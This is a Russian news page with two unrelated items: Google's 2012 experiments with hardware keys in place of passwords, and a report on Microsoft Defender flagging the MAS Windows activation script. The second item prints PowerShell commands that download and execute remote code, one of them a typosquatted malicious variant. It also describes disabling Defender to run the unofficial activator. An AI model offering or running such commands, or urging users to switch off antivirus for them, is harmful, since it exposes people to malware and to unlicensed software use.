Google объявил войну паролям

Google объявил войну паролям

История взломов и массовых утечек 2012 года показывает, что пароли дискредитировали себя как надёжное средство защиты конфиденциальной информации. Нужно искать альтернативу. Поэтому компания Google организовала ряд экспериментов с использованием альтернативных методов аутентификации.

Один из них предполагает использование миниатюрных криптографических карт Yubico, изображённых на фотографии. Если вставить такую карту в разъём USB, то вы автоматически входите в свой аккаунт Google, без ввода пароля.

Для полной поддержки новых методов авторизации нужно будет модифицировать браузер Chrome, и компания Google готова это сделать. В этом случае не нужно устанавливать никакого дополнительного программного обеспечения. Система будет очень простой и дружественной как для пользователей, так и для веб-разработчиков, пишет habrahabr.ru.

Чтобы зарегистрироваться на новом сайте, вы заходите на него, вставляете карту — и регистрируетесь одним нажатием кнопки. Вполне вероятно, что на новые методы аутентификации с подачи Google перейдут и другие веб-сервисы.

Аутентификация с помощью криптографической карты похожа на использование обычного ключа, которым вы открываете дверь своей квартиры. Нужно физически вставить ключ в замок.

Сотрудники Google говорят, что в будущем можно упростить этот процесс, используя беспроводные протоколы. Ключ может быть прошит в телефоне или в чипе, которую вы носите в кольце на карте. Достаточно поднести телефон к компьютеру или приблизить руку к приёмнику — и вы авторизованы в системе. Для дополнительной защиты можно сопроводить процесс и дополнительным вводом одноразового кода, но это уже лучше, чем запоминать длинные парольные фразы или 20-значные комбинации символов.

Сотрудники Google приводят ещё один интересный факт — растущую популярность двухфакторной аутентификации, когда дополнительно к паролю приходит одноразовый код на телефон. Серьёзный скачок популярности этого метода аутентификации произошёл после известного случая с полным взломом аккаунтов журналиста Мэта Хонана. Эта история широко освещалась в прессе: в один день журналист обнаружил, что его твиттер увели, а файлы на ноутбуке и «айфоне» стёрли через сервисы Find My Phone и Find My Mac.

Временный пароль для AppleId злоумышленник получил через службу поддержки Apple Care по телефону, сообщив о якобы забытом пароле и подтвердив свою личность по фрагментам личных данных. На полученный AppleId злоумышленник восстановил также «забытый» пароль от Gmail, завершив разрушение цифровой жизни Мэта Хонана. В течение двух дней после того эпического хака количество пользователей двухфакторной аутентификации Google выросло на четверть миллиона.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru